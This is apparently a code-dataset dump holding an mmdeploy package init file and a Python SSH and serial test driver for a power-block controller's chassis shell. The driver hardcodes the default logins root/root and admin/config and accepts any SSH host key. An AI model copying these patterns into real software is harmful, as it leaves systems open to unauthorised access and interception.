| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8de0c41b3cf54e7ac5de2e315b41f7a9ca776f53
| 321
|
py
|
Python
|
mmdeploy/codebase/mmdet3d/models/__init__.py
|
xizi/mmdeploy
|
6f0569156cd93412e4571ccfb6f0c4fbbacf3cdc
|
[
"Apache-2.0"
] | 746
|
2021-12-27T10:50:28.000Z
|
2022-03-31T13:34:14.000Z
|
mmdeploy/codebase/mmdet3d/models/__init__.py
|
xizi/mmdeploy
|
6f0569156cd93412e4571ccfb6f0c4fbbacf3cdc
|
[
"Apache-2.0"
] | 253
|
2021-12-28T05:59:13.000Z
|
2022-03-31T18:22:25.000Z
|
mmdeploy/codebase/mmdet3d/models/__init__.py
|
xizi/mmdeploy
|
6f0569156cd93412e4571ccfb6f0c4fbbacf3cdc
|
[
"Apache-2.0"
] | 147
|
2021-12-27T10:50:33.000Z
|
2022-03-30T10:44:20.000Z
|
# Copyright (c) OpenMMLab. All rights reserved.
from .base import * # noqa: F401,F403
from .centerpoint import * # noqa: F401,F403
from .mvx_two_stage import * # noqa: F401,F403
from .pillar_encode import * # noqa: F401,F403
from .pillar_scatter import * # noqa: F401,F403
from .voxelnet import * # noqa: F401,F403
| 40.125
| 48
| 0.719626
| 46
| 321
| 4.934783
| 0.434783
| 0.264317
| 0.370044
| 0.475771
| 0.537445
| 0.246696
| 0
| 0
| 0
| 0
| 0
| 0.135338
| 0.17134
| 321
| 7
| 49
| 45.857143
| 0.718045
| 0.439252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8dec6f5db108207f66e53e121ed45ad5391ae9ba
| 32,925
|
py
|
Python
|
PBC_SSH_Comm.py
|
scatelani-cpi/PBC_Chassis-Shell
|
f469774477c6854c2d646c6e6cd3b4f5ebd593fa
|
[
"MIT"
] | null | null | null |
PBC_SSH_Comm.py
|
scatelani-cpi/PBC_Chassis-Shell
|
f469774477c6854c2d646c6e6cd3b4f5ebd593fa
|
[
"MIT"
] | null | null | null |
PBC_SSH_Comm.py
|
scatelani-cpi/PBC_Chassis-Shell
|
f469774477c6854c2d646c6e6cd3b4f5ebd593fa
|
[
"MIT"
] | null | null | null |
import serial
import json
import paramiko
import os
import sys
import time
import re
import logging
'''
PBC SSH Driver v2021-0620-r1
'''
class PBC_Ser(object):
def __init__(self, serial_comport: str):
self.serialcom = serial.Serial(serial_comport, 115200)
def send_data(self, data_out: str):
self.data = data_out
self.serialcom.write(self.data.encode())
time.sleep(.1)
def close(self):
self.serialcom.close()
time.sleep(.1)
def enable_ssh(self):
# last_ip = input('Input last IP address in hex <xxxx> for UUT:')
# while not last_ip:
# last_ip = input('Input last IP address in hex <xxxx> for UUT:')
self.pbc_console_login()
self.pbc_console_exit()
print(f'Please wait, exiting PBC console...')
# self.send_data("\r")
# time.sleep(1)
# self.send_data("\r")
# time.sleep(.5)
self.send_data("root\r")
time.sleep(.5)
self.send_data("root\r")
time.sleep(1)
self.send_data("ip addr add fe80::ffd2:8387:281b:1074/255.255.255.0 dev br0\r")
time.sleep(1)
print(f'Your PBC IP address is: fe80::ffd2:8387:281b:1074')
def enable_ssh_2(self):
# last_ip = input('Input last IP address in hex <xxxx> for UUT:')
# while not last_ip:
# last_ip = input('Input last IP address in hex <xxxx> for UUT:')
# self.pbc_console_login()
# self.pbc_console_exit()
# self.pbc_console_exit()
# self.pbc_console_exit()
print(f'Please wait, exiting PBC console...')
self.send_data("admin\r")
time.sleep(1)
self.send_data("config\r")
time.sleep(.5)
self.send_data("sudo -s\r")
time.sleep(.5)
self.send_data("config\r")
time.sleep(1)
self.send_data("ip addr add fe80::ffd2:8387:281b:1074/255.255.255.0 dev br0\r")
time.sleep(1)
print(f'Your PBC IP address is: fe80::ffd2:8387:281b:1074')
def pbc_console_login(self):
self.send_data('root\r')
self.send_data('root\r')
def pbc_console_exit(self):
self.send_data('\x03') # send ctrl + c key
self.send_data('exit\r')
time.sleep(9) # Must wait for console exit
def enter_chassis_shell(self):
self.send_data("chassis-shell\r")
def exit_chassis_shell(self):
self.send_data('\x03') # send ctrl + c key
def return_chassis_shell_root(self):
self.send_data('/\r') # send ctrl + c key
class PBC_SSH(object):
def __init__(self, addr: str):
# self.port = 22
# self.user = 'root'
# self.password = 'root'
# self.timeout = 23
self.response = str()
self.match = str()
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh.connect(addr, 22, 'root', 'root')
self.channel = self.ssh.invoke_shell()
self._logger = logging.getLogger(self.__class__.__name__)
def pbc_comm_test(self):
"""performing this test will login to chassis-shell CLI"""
if self.process_channel("chassis-shell\r").find("/>") == -1:
return False
else:
return True
def pbc_end_connection(self):
self.ssh.close()
def json_from_s(self, s):
self.match = re.findall(r"{.+[:,].+}|\[.+[,:].+\]", s)
return json.loads(self.match[0]) if self.match else None
def process_channel(self, input):
self.channel_data = str()
self.host = str()
self.scrfile = str()
time.sleep(.5)
self.channel.send(input)
time.sleep(1.5)
if self.channel.recv_ready():
self.channel_data += str(self.channel.recv(9999).decode("utf8"))
# print(self.channel_data)
self._logger.info(self.channel_data)
return self.channel_data
# ######################### Communication Test ###########################
def can_dump(self):
self.process_channel("candump can0 | grep 7[0-9]\r")
time.sleep(5)
self.process_channel("\x03")
# ######################### EMB Tests ###########################
def pbc_console_login_old(self):
self.process_channel('root\r')
self.process_channel('root\r')
def pbc_console_login(self):
# self.process_channel('admin\r')
# time.sleep(.5)
# self.process_channel('config\r')
# time.sleep(.5)
self.process_channel('sudo -s\r')
time.sleep(.5)
self.process_channel('config\r')
def pbc_console_exit(self):
self.process_channel('\x03') # send ctrl + c key
self.process_channel('exit\r')
def enter_chassis_shell(self):
self.process_channel("chassis-shell\r")
def exit_chassis_shell(self):
self.process_channel('\x03') # send ctrl + c key
def return_chassis_shell_root(self):
self.process_channel('/\r') # send ctrl + c key
def platform_sw_version(self):
self.process_channel("/\r")
self.process_channel("/Platform\r")
self.process_channel("/PowerMonitor/board-rev\r")
def init_all_can(self, evt: bool): # Include the PM --no-detect bypass, must remove for DVT
self.process_channel("CCB can0\r")
self.process_channel("AUXPS can0\r")
self.process_channel("/PM\r")
if evt: self.pm_no_detect()
for i in range(1, 6):
self.process_channel('/PM/PM' + str(i) + ' can0\r')
def init_all_pm(self):
self.process_channel('/\r')
self.process_channel('/PM\r')
for i in range(1, 6):
self.process_channel('PM' + str(i) + ' can0\r')
def pm_init(self, pm):
self.process_channel('/\r')
self.process_channel('/PM\r')
self.process_channel('PM' + str(pm) + ' can0\r')
print(f'\nWating for PM{pm} to come online...')
time.sleep(6)
def get_temps(self):
self.process_channel("/\r")
self.process_channel("/TempSensor/TEMP1\r")
self.process_channel("/CCB/temps\r")
time.sleep(1)
self.process_channel("/AUXPS/temps\r")
time.sleep(1)
self.process_channel("/PowerMonitor/temp 0\r") # Powermonitor read DRY-Zone RTD temp read on C
time.sleep(1)
def toggle_all_pm(self):
self.process_channel("/\r")
for i in range(1, 6):
self.process_channel('/PM/PM' + str(i) + ' op\r')
time.sleep(.5)
def show_pm_status(self, pm):
self.process_channel("/\r")
self.process_channel("/PM\r")
self.process_channel("PM" + str(pm) + "\r")
# ################### PBC LV Tests #########################
def ext_chassis_led(self, r, g):
if r == 1:
self.process_channel("/ExtChassisLed/RED1 1\r") # Set GREEN ON
if r == 0:
self.process_channel("/ExtChassisLed/RED1 0\r") # Set GREEN ON
if g == 1:
self.process_channel("/ExtChassisLed/GREEN1 1\r") # Set GREEN ON
if g == 0:
self.process_channel("/ExtChassisLed/GREEN1 0\r") # Set GREEN ON
def dry_zone_fan(self, fan, speed, enable):
self.process_channel("/Fan/DRY-Zone-" + str(fan) + "\r") # Enter PBC Fan directory
self.process_channel("speed " + str(speed) + "\r") # Set PBC Fan speed
time.sleep(1.5)
self.process_channel("power " + str(enable) + "\r") # Set PBC Fan enable
time.sleep(1.5)
self.process_channel("\r") # Status PBC Fan
def dry_zone_one_fan_ctrl(self, fan, sp_else_pwr, enable):
self.process_channel("/Fan/DRY-Zone-" + str(fan) + "\r") # Enter PBC Fan directory
if sp_else_pwr:
sp = "100" if enable else "0"
self.process_channel("speed " + str(sp) + "\r") # Set PBC Fan speed
time.sleep(.25)
if not sp_else_pwr:
self.process_channel("power " + str(enable) + "\r") # Set PBC Fan enable
time.sleep(.25)
self.process_channel("\r") # Status PBC Fan
# time.sleep(.5)
def dry_zone_fan_current(self, fan): # DRY-Zone fan currents Powermonitor read DRY-Zone fan 1 and 2
self.process_channel("/PowerMonitor/fan " + str(fan) + "\r") # Powermonitor read DRY-Zone fan 1
def gpio_expander(self):
self.process_channel("/\r")
self.process_channel("/GpioExpander\r") # Read GpioExpander status
def safety_sw(self, category):
self.process_channel("/Reed\r")
if category == 'thermal':
self.process_channel("/ThermalSw\r") # Read ThermalSw status
if category == 'reed':
self.process_channel("/Reed\r")
if category == 'reed1':
self.process_channel("REED1-DoorWetBoxFront\r")
if category == 'surge':
self.process_channel("/SurgeDet\r")
# def pm_present_can_id():
# toggle_all_pm()
# show_pm_status()
# CCB Tests
def ccb_init(self):
self.process_channel('\x03') # send ctrl + c key
self.enter_chassis_shell()
self.process_channel("/CCB can0\r")
time.sleep(1)
# self.process_channel("/CCB op\r")
def ccb_info(self):
self.process_channel("/\r")
self.process_channel("/CCB\r")
def ccb_read_logs(self): #
self.process_channel(".quit\r")
self.process_channel("cat /var/log/CCB-selftest.log\r") # read dump
def ccb_bl_fw_version(self):
self.process_channel("/CCB/bootversion\r")
self.process_channel("/CCB/appversion\r")
def ccb_fault_info(self):
self.process_channel("/CCB/faultInfo\r")
def ccb_fan_bank_info(self, fanBank):
if fanBank == 1:
self.process_channel("/CCB/fanBank1\r")
if fanBank == 2:
self.process_channel("/CCB/fanBank2\r")
if fanBank == 3:
self.process_channel("/CCB/fanBank3\r")
def ccb_pump_info(self):
self.process_channel("/CCB/pump\r")
def ccb_self_test(self): # must run before trying to poll for CCB faults in ccb_fault_info()
self.process_channel("/CCB/selfTest\r")
def ccb_coolant_level(self): # must run while filling up coolant tank
self.process_channel("/CCB/coolantLevel\r")
def ccb_fan_speed(self, b_num, f_speed): # <bank_number> <speed 0-100> set fan-bank speed
self.process_channel("/CCB/fanspeed " + str(b_num) + " " + str(f_speed) + "\r") # Set CCB Fan speed
time.sleep(1)
def ccb_pump_speed(self, p_speed): # <speed 0-100> set pump speed
self.process_channel("/CCB/pumpspeed " + " " + str(p_speed) + "\r") # Set CCB pump speed
time.sleep(1)
# Close Loop Thermal Control
def autoThermal(self, poll, log_freq): # <bank_number> <speed 0-100> set fan-bank speed
self.process_channel("/PowerBlock/autoThermal " + str(poll) + "\r") # Set to close loop and poll freq
time.sleep(1)
self.process_channel("/PowerBlock/logInfo " + str(log_freq) + "\r") # Set to log freq in sec, default 5 sec
time.sleep(1)
# AUXPS Tests
def auxps_info(self):
# self.process_channel("/\r")
self.process_channel("/AUXPS\r")
def auxps_init(self):
self.process_channel("/\r")
self.process_channel("/AUXPS can0\r")
def auxps_read_logs(self): #
self.process_channel(".quit\r")
time.sleep(1)
self.process_channel("cat /var/log/AuxPS-selftest.log\r") # read dump
def auxps_remove_logs(self): #
self.process_channel(".quit\r")
time.sleep(1)
self.process_channel("rm -v /var/log/AuxPS-selftest.log\r") # read dump
def auxps_bl_fw_version(self):
self.process_channel("/AUXPS/bootversion\r")
self.process_channel("/AUXPS/appversion\r")
def auxps_fault_info(self):
self.process_channel("/AUXPS/faults\r")
def auxps_bank_info(self, auxBank):
if auxBank == 'ccb':
return self.json_from_s(self.process_channel("/AUXPS/CCBChannel\r"))
if auxBank == 'pbc':
return self.json_from_s(self.process_channel("/AUXPS/PBCChannel\r"))
if auxBank == 'ext':
return self.json_from_s(self.process_channel("/AUXPS/ExtChannel\r"))
if auxBank == 'input':
return self.json_from_s(self.process_channel("/AUXPS/InputChannel\r"))
def auxps_channel_ctrl(self, ch: str, set_to: str): # <ccb|pbc|ext> <0-3> 0:enable, 1:disable
self.process_channel(f"/AUXPS/channelCtrl {ch} {set_to}\r")
if ch == 'ccb':
return self.json_from_s(self.process_channel("/AUXPS/CCBChannel\r"))
if ch == 'pbc':
return self.json_from_s(self.process_channel("/AUXPS/PBCChannel\r"))
if ch == 'ext':
return self.json_from_s(self.process_channel("/AUXPS/ExtChannel\r"))
def auxps_self_test(self): # must run before trying to poll for AUXPS faults in AUXPS_fault_info()
self.process_channel("/AUXPS/selfTest\r")
def auxps_shunt_ctrl(self, s_state): #
self.process_channel("/AUXPS/shuntControl " + str(s_state) + "\r")
def auxps_fan_speed(self, af_speed): # <speed 0-100> set fan speed
return self.json_from_s(self.process_channel("/AUXPS/fanspeed " + str(af_speed) + "\r")) # Set AUXPS Fan speed
def auxps_fan_info(self): # <speed 0-100>, <rpm>
# self.response = self.process_channel("/AUXPS/fanstatus\r") # SGet auxps Fan speed
# time.sleep(1)
# return self.json_from_s(self.response)
return self.json_from_s(self.process_channel("/AUXPS/fanstatus\r")) # SGet auxps Fan speed
def auxps_autoPowerCycle(self, seconds): # <seconds> Set auto power-cycle timeout on CAN/HB miss (current: 0sec)
self.process_channel("/AUXPS/autoPowerCycle " + str(seconds) + "\r") #
time.sleep(1)
def auxps_temps(self, humidity=False, dewpoint=False):
# self.process_channel("/AUXPS/temps\r") #
# time.sleep(1)
if humidity: self.process_channel("/AUXPS/humidity\r") #
if dewpoint: self.process_channel("/AUXPS/dewpoint\r") #
return self.json_from_s(self.process_channel("/AUXPS/temps\r"))
def auxps_input_channel_info(self): # show all 3x input channels
return self.json_from_s(self.process_channel("/AUXPS/InputChannel\r"))
# PM Power Control
def pm_no_detect(self): #
self.process_channel("/\r")
self.process_channel("/PM\r")
self.process_channel("--no-detect\r") # set PBC to no MPx GPIO pin detect
time.sleep(1)
def pm_bl_fw_version(self, pm):
self.process_channel("/PM/PM" + str(pm) + "/bootversion\r")
self.process_channel("/PM/PM" + str(pm) + "/appversion\r")
# def pm_pwr_ctrl(self, pm, bus, volts, amps): # <a|b|0> <volts> <amps> [maxvolts] Set pm output bus/volts/amps
# self.process_channel("/PM/PM" + str(pm) + "/setTargets " + str(bus) + " " + str(volts) + " " + str(amps) + "\r")
# time.sleep(1)
def pm_pwr_ctrl(self, pm, bus, volts, amps): # <a|b|0> <volts> <amps> [maxvolts] Set pm output bus/volts/amps
self.process_channel("/\r")
self.process_channel(f"/PM/PM{pm}\r")
# self.process_channel("/PM/PM" + str(pm) + " \r")
self.process_channel(f"setTargets {bus} {volts} {amps}\r")
time.sleep(2)
self.process_channel("\r")
self.process_channel("/\r")
#### BK Test
def bk_pwr_ctrl(self, state):
# self._res_manager.write(b"OUTPut ON\r\n")
if state == 1:
self.process_channel("OUTPut ON\n")
if state == 0:
self.process_channel("OUTPut OFF\n")
time.sleep(1)
# Burn-in test
def pb_bi_test(self, bus: str, volts: str, amps: str, pm1_5: bool):
if pm1_5:
power_kw = '200' # set 200kW max power if PM 1.5
else:
power_kw = '156'
self.pbc_console_login()
self.enable_ssh()
time.sleep(1)
self.process_channel(f"test-pnode -r {bus} {power_kw}\r") #
time.sleep(1)
self.process_channel(f"test-pnode {bus} {volts} {amps}\r") # < a | b > < powerkw >
time.sleep(1)
class PBC_SSH_2(object):
"""A copy of PBC_SSH with the addition of login password support for EMB plat version > 177 """
def __init__(self, addr: str, user='admin', password='config'):
# self.port = 22
# self.user = 'root'
# self.password = 'root'
# self.timeout = 23
self.response = str()
self.match = str()
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh.connect(addr, 22, user, password)
self.channel = self.ssh.invoke_shell()
self._logger = logging.getLogger(self.__class__.__name__)
def pbc_file_transfer(self, localpath='none', targetpath='none', direction='up'):
sftp = self.ssh.open_sftp()
if direction == 'up':
print('wait for file transfer')
sftp.put(localpath, targetpath)
if direction == 'down':
print('wait for file transfer')
sftp.get(targetpath, localpath)
time.sleep(1)
sftp.close()
def pbc_comm_test(self):
"""performing this test will login to chassis-shell CLI"""
self.pbc_console_login()
if self.process_channel("chassis-shell\r").find("/>") == -1:
return False
else:
return True
def pbc_end_connection(self):
self.ssh.close()
def json_from_s(self, s):
self.match = re.findall(r"{.+[:,].+}|\[.+[,:].+\]", s)
return json.loads(self.match[0]) if self.match else None
def process_channel(self, input):
self.channel_data = str()
self.host = str()
self.scrfile = str()
time.sleep(.5)
self.channel.send(input)
time.sleep(1.5)
if self.channel.recv_ready():
self.channel_data += str(self.channel.recv(9999).decode("utf8"))
# print(self.channel_data)
self._logger.info(self.channel_data)
return self.channel_data
# ######################### Communication Test ###########################
def can_dump(self):
self.process_channel("candump can0 | grep 7[0-9]\r")
time.sleep(5)
self.process_channel("\x03")
# ######################### EMB Tests ###########################
def pbc_console_login_old(self):
self.process_channel('root\r')
self.process_channel('root\r')
def pbc_console_login(self):
# self.process_channel('admin\r')
# time.sleep(.5)
# self.process_channel('config\r')
# time.sleep(.5)
self.process_channel('sudo -s\r')
time.sleep(.5)
if self.process_channel('config\r').find("root@") == -1:
return False
return True
def pbc_console_exit(self):
self.process_channel('\x03') # send ctrl + c key
self.process_channel('exit\r')
def enter_chassis_shell(self):
self.process_channel("chassis-shell\r")
def exit_chassis_shell(self):
self.process_channel('\x03') # send ctrl + c key
def return_chassis_shell_root(self):
self.process_channel('/\r') # send ctrl + c key
def platform_sw_version(self):
self.process_channel("/\r")
self.process_channel("/Platform\r")
self.process_channel("/PowerMonitor/board-rev\r")
plat_read = self.process_channel("/Platform/EMB_PLATFORM_VERSION\r").split(" ")
self._logger.info(f'UUT Platform version read: {plat_read[1]}')
return plat_read[1]
def init_all_can(self, evt: bool): # Include the PM --no-detect bypass, must remove for DVT
self.process_channel("CCB can0\r")
self.process_channel("AUXPS can0\r")
self.process_channel("/PM\r")
if evt: self.pm_no_detect()
for i in range(1, 6):
self.process_channel('/PM/PM' + str(i) + ' can0\r')
def init_all_pm(self):
self.process_channel('/\r')
self.process_channel('/PM\r')
for i in range(1, 6):
self.process_channel('PM' + str(i) + ' can0\r')
def pm_init(self, pm):
self.process_channel('/\r')
self.process_channel('/PM\r')
self.process_channel('PM' + str(pm) + ' can0\r')
print(f'\nWating for PM{pm} to come online...')
time.sleep(6)
def get_temps(self):
self.process_channel("/\r")
self.process_channel("/TempSensor/TEMP1\r")
self.process_channel("/CCB/temps\r")
time.sleep(1)
self.process_channel("/AUXPS/temps\r")
time.sleep(1)
self.process_channel("/PowerMonitor/temp 0\r") # Powermonitor read DRY-Zone RTD temp read on C
time.sleep(1)
def toggle_all_pm(self):
self.process_channel("/\r")
for i in range(1, 6):
self.process_channel('/PM/PM' + str(i) + ' op\r')
time.sleep(.5)
def show_pm_status(self, pm):
self.process_channel("/\r")
self.process_channel("/PM\r")
self.process_channel("PM" + str(pm) + "\r")
# ################### PBC LV Tests #########################
def ext_chassis_led(self, r, g):
if r == 1:
self.process_channel("/ExtChassisLed/RED1 1\r") # Set GREEN ON
if r == 0:
self.process_channel("/ExtChassisLed/RED1 0\r") # Set GREEN ON
if g == 1:
self.process_channel("/ExtChassisLed/GREEN1 1\r") # Set GREEN ON
if g == 0:
self.process_channel("/ExtChassisLed/GREEN1 0\r") # Set GREEN ON
def dry_zone_fan(self, fan, speed, enable):
self.process_channel("/Fan/DRY-Zone-" + str(fan) + "\r") # Enter PBC Fan directory
self.process_channel("speed " + str(speed) + "\r") # Set PBC Fan speed
time.sleep(1.5)
self.process_channel("power " + str(enable) + "\r") # Set PBC Fan enable
time.sleep(1.5)
self.process_channel("\r") # Status PBC Fan
def dry_zone_one_fan_ctrl(self, fan, sp_else_pwr, enable):
self.process_channel("/Fan/DRY-Zone-" + str(fan) + "\r") # Enter PBC Fan directory
if sp_else_pwr:
sp = "100" if enable else "0"
self.process_channel("speed " + str(sp) + "\r") # Set PBC Fan speed
time.sleep(.25)
if not sp_else_pwr:
self.process_channel("power " + str(enable) + "\r") # Set PBC Fan enable
time.sleep(.25)
self.process_channel("\r") # Status PBC Fan
# time.sleep(.5)
def dry_zone_fan_current(self, fan): # DRY-Zone fan currents Powermonitor read DRY-Zone fan 1 and 2
self.process_channel("/PowerMonitor/fan " + str(fan) + "\r") # Powermonitor read DRY-Zone fan 1
def gpio_expander(self):
self.process_channel("/\r")
self.process_channel("/GpioExpander\r") # Read GpioExpander status
def safety_sw(self, category):
self.process_channel("/Reed\r")
if category == 'thermal':
self.process_channel("/ThermalSw\r") # Read ThermalSw status
if category == 'reed':
self.process_channel("/Reed\r")
if category == 'reed1':
self.process_channel("REED1-DoorWetBoxFront\r")
if category == 'surge':
self.process_channel("/SurgeDet\r")
# def pm_present_can_id():
# toggle_all_pm()
# show_pm_status()
# CCB Tests
def ccb_init(self):
self.process_channel('\x03') # send ctrl + c key
self.enter_chassis_shell()
self.process_channel("/CCB can0\r")
time.sleep(1)
# self.process_channel("/CCB op\r")
def ccb_info(self):
self.process_channel("/\r")
self.process_channel("/CCB\r")
def ccb_read_logs(self): #
self.process_channel(".quit\r")
self.process_channel("cat /var/log/CCB-selftest.log\r") # read dump
def ccb_bl_fw_version(self):
self.process_channel("/CCB/bootversion\r")
self.process_channel("/CCB/appversion\r")
def ccb_fault_info(self):
self.process_channel("/CCB/faultInfo\r")
def ccb_fan_bank_info(self, fanBank):
if fanBank == 1:
self.process_channel("/CCB/fanBank1\r")
if fanBank == 2:
self.process_channel("/CCB/fanBank2\r")
if fanBank == 3:
self.process_channel("/CCB/fanBank3\r")
def ccb_pump_info(self):
self.process_channel("/CCB/pump\r")
def ccb_self_test(self): # must run before trying to poll for CCB faults in ccb_fault_info()
self.process_channel("/CCB/selfTest\r")
def ccb_coolant_level(self): # must run while filling up coolant tank
self.process_channel("/CCB/coolantLevel\r")
def ccb_fan_speed(self, b_num, f_speed): # <bank_number> <speed 0-100> set fan-bank speed
self.process_channel("/CCB/fanspeed " + str(b_num) + " " + str(f_speed) + "\r") # Set CCB Fan speed
time.sleep(1)
def ccb_pump_speed(self, p_speed): # <speed 0-100> set pump speed
self.process_channel("/CCB/pumpspeed " + " " + str(p_speed) + "\r") # Set CCB pump speed
time.sleep(1)
# Close Loop Thermal Control
def autoThermal(self, poll, log_freq): # <bank_number> <speed 0-100> set fan-bank speed
self.process_channel("/PowerBlock/autoThermal " + str(poll) + "\r") # Set to close loop and poll freq
time.sleep(1)
self.process_channel("/PowerBlock/logInfo " + str(log_freq) + "\r") # Set to log freq in sec, default 5 sec
time.sleep(1)
# AUXPS Tests
def auxps_info(self):
# self.process_channel("/\r")
self.process_channel("/AUXPS\r")
def auxps_init(self):
self.process_channel("/\r")
self.process_channel("/AUXPS can0\r")
def auxps_read_logs(self): #
self.process_channel(".quit\r")
time.sleep(1)
self.process_channel("cat /var/log/AuxPS-selftest.log\r") # read dump
def auxps_remove_logs(self): #
self.process_channel(".quit\r")
time.sleep(1)
self.process_channel("rm -v /var/log/AuxPS-selftest.log\r") # read dump
def auxps_bl_fw_version(self):
self.process_channel("/AUXPS/bootversion\r")
self.process_channel("/AUXPS/appversion\r")
def auxps_bl_fw_version_test(self, check_bl_against: str):
# Test BL/FW version
self._logger.info('\n-->BL/App version test<--')
self.bl_read = self.process_channel("/AUXPS/bootversion\r").split(" ")
if self.bl_read[1].find(check_bl_against) != -1:
self._logger.info(f'UUT PASSED Bootloader version test: {self.bl_read[1]}')
else:
self._logger.info(f'UUT FAILED current UUT BL version is: {self.bl_read[1]}')
return False
self.fw_read = self.process_channel("/AUXPS/appversion\r").split(" ")
self._logger.info(f'UUT current Application version is: {self.fw_read[1]}')
return True
def auxps_fault_info(self):
self.process_channel("/AUXPS/faults\r")
def auxps_bank_info(self, auxBank):
if auxBank == 'ccb':
return self.json_from_s(self.process_channel("/AUXPS/CCBChannel\r"))
if auxBank == 'pbc':
return self.json_from_s(self.process_channel("/AUXPS/PBCChannel\r"))
if auxBank == 'ext':
return self.json_from_s(self.process_channel("/AUXPS/ExtChannel\r"))
if auxBank == 'input':
return self.json_from_s(self.process_channel("/AUXPS/InputChannel\r"))
def auxps_channel_ctrl(self, ch: str, set_to: str): # <ccb|pbc|ext> <0-3> 0:enable, 1:disable
self.process_channel(f"/AUXPS/channelCtrl {ch} {set_to}\r")
if ch == 'ccb':
return self.json_from_s(self.process_channel("/AUXPS/CCBChannel\r"))
if ch == 'pbc':
return self.json_from_s(self.process_channel("/AUXPS/PBCChannel\r"))
if ch == 'ext':
return self.json_from_s(self.process_channel("/AUXPS/ExtChannel\r"))
def auxps_self_test(self): # must run before trying to poll for AUXPS faults in AUXPS_fault_info()
self.process_channel("/AUXPS/selfTest\r")
def auxps_shunt_ctrl(self, s_state): #
self.process_channel("/AUXPS/shuntControl " + str(s_state) + "\r")
def auxps_fan_speed(self, af_speed): # <speed 0-100> set fan speed
return self.json_from_s(self.process_channel("/AUXPS/fanspeed " + str(af_speed) + "\r")) # Set AUXPS Fan speed
def auxps_fan_info(self): # <speed 0-100>, <rpm>
# self.response = self.process_channel("/AUXPS/fanstatus\r") # SGet auxps Fan speed
# time.sleep(1)
# return self.json_from_s(self.response)
return self.json_from_s(self.process_channel("/AUXPS/fanstatus\r")) # SGet auxps Fan speed
def auxps_autoPowerCycle(self, seconds): # <seconds> Set auto power-cycle timeout on CAN/HB miss (current: 0sec)
self.process_channel("/AUXPS/autoPowerCycle " + str(seconds) + "\r") #
time.sleep(1)
def auxps_temps(self, humidity=False, dewpoint=False):
# self.process_channel("/AUXPS/temps\r") #
# time.sleep(1)
if humidity: self.process_channel("/AUXPS/humidity\r") #
if dewpoint: self.process_channel("/AUXPS/dewpoint\r") #
return self.json_from_s(self.process_channel("/AUXPS/temps\r"))
def auxps_input_channel_info(self): # show all 3x input channels
return self.json_from_s(self.process_channel("/AUXPS/InputChannel\r"))
# PM Power Control
def pm_no_detect(self): #
self.process_channel("/\r")
self.process_channel("/PM\r")
self.process_channel("--no-detect\r") # set PBC to no MPx GPIO pin detect
time.sleep(1)
def pm_bl_fw_version(self, pm):
self.process_channel("/PM/PM" + str(pm) + "/bootversion\r")
self.process_channel("/PM/PM" + str(pm) + "/appversion\r")
# def pm_pwr_ctrl(self, pm, bus, volts, amps): # <a|b|0> <volts> <amps> [maxvolts] Set pm output bus/volts/amps
# self.process_channel("/PM/PM" + str(pm) + "/setTargets " + str(bus) + " " + str(volts) + " " + str(amps) + "\r")
# time.sleep(1)
def pm_pwr_ctrl(self, pm, bus, volts, amps): # <a|b|0> <volts> <amps> [maxvolts] Set pm output bus/volts/amps
self.process_channel("/\r")
self.process_channel(f"/PM/PM{pm}\r")
# self.process_channel("/PM/PM" + str(pm) + " \r")
self.process_channel(f"setTargets {bus} {volts} {amps}\r")
time.sleep(2)
self.process_channel("\r")
self.process_channel("/\r")
#### BK Test
def bk_pwr_ctrl(self, state):
# self._res_manager.write(b"OUTPut ON\r\n")
if state == 1:
self.process_channel("OUTPut ON\n")
if state == 0:
self.process_channel("OUTPut OFF\n")
time.sleep(1)
# Burn-in test
def pb_bi_test(self, bus: str, volts: str, amps: str, pm1_5: bool):
if pm1_5:
power_kw = '200' # set 200kW max power if PM 1.5
else:
power_kw = '156'
self.pbc_console_login()
self.enable_ssh()
time.sleep(1)
self.process_channel(f"test-pnode -r {bus} {power_kw}\r") #
time.sleep(1)
self.process_channel(f"test-pnode {bus} {volts} {amps}\r") # < a | b > < powerkw >
time.sleep(1)
def main():
logging.basicConfig(level=logging.DEBUG)
stdout_handler = logging.StreamHandler(sys.stdout)
logger = logging.getLogger()
logger.addHandler(stdout_handler)
_pbc_ser = PBC_Ser('COM18')
_pbc_ser.enable_ssh_2()
_pbc_ser.close()
_pbc_ssh = PBC_SSH('fe80::ffd2:8387:281b:1074')
_pbc_ssh.pbc_console_login()
_pbc_ssh.enter_chassis_shell()
_pbc_ssh.safety_sw('reed1')
_pbc_ssh.pbc_end_connection()
if __name__ == "__main__": main()
| 39.010664
| 123
| 0.585998
| 4,411
| 32,925
| 4.194967
| 0.077533
| 0.189905
| 0.242218
| 0.053394
| 0.926178
| 0.914505
| 0.904399
| 0.894942
| 0.893969
| 0.888348
| 0
| 0.018384
| 0.266484
| 32,925
| 843
| 124
| 39.05694
| 0.747795
| 0.165072
| 0
| 0.893092
| 0
| 0.003289
| 0.160132
| 0.028861
| 0
| 0
| 0
| 0
| 0
| 1
| 0.208882
| false
| 0.004934
| 0.013158
| 0.009868
| 0.284539
| 0.013158
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8dec709c22a5e93eb6f74d948b0cac54e47374c5
| 219
|
py
|
Python
|
